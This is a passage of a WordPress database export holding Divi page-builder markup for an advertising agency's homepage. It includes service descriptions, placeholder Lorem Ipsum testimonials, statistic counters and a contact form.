saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-5-1.jpg\" alt=\"digital marketing agency\" title_text=\"digital-marketing-agency\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]<p>Best Advertising Is Done By Satisfied Customers. We Believe &amp; Nurture It In Our Business.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\" global_module=\"630\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.5.2\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" min_length=\"10\" max_length=\"10\" allowed_symbols=\"numbers\" fullwidth_field=\"on\" _builder_version=\"4.5.2\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home New','','inherit','closed','closed','','564-revision-v1','','','2020-08-07 20:35:27','2020-08-07 20:35:27','',564,'https://wthtest1.in8.cdn-alpha.com/2020/08/07/564-revision-v1/',0,'revision','',0),(635,1,'2020-08-07 20:46:30','2020-08-07 20:46:30','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/banner.jpg\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"//i.ytimg.com/vi/f47r43eO6BU/hqdefault.jpg\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"50px||3px||false|false\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" custom_padding_last_edited=\"on|phone\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.1\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||23px||false|false\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||||false|false\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" 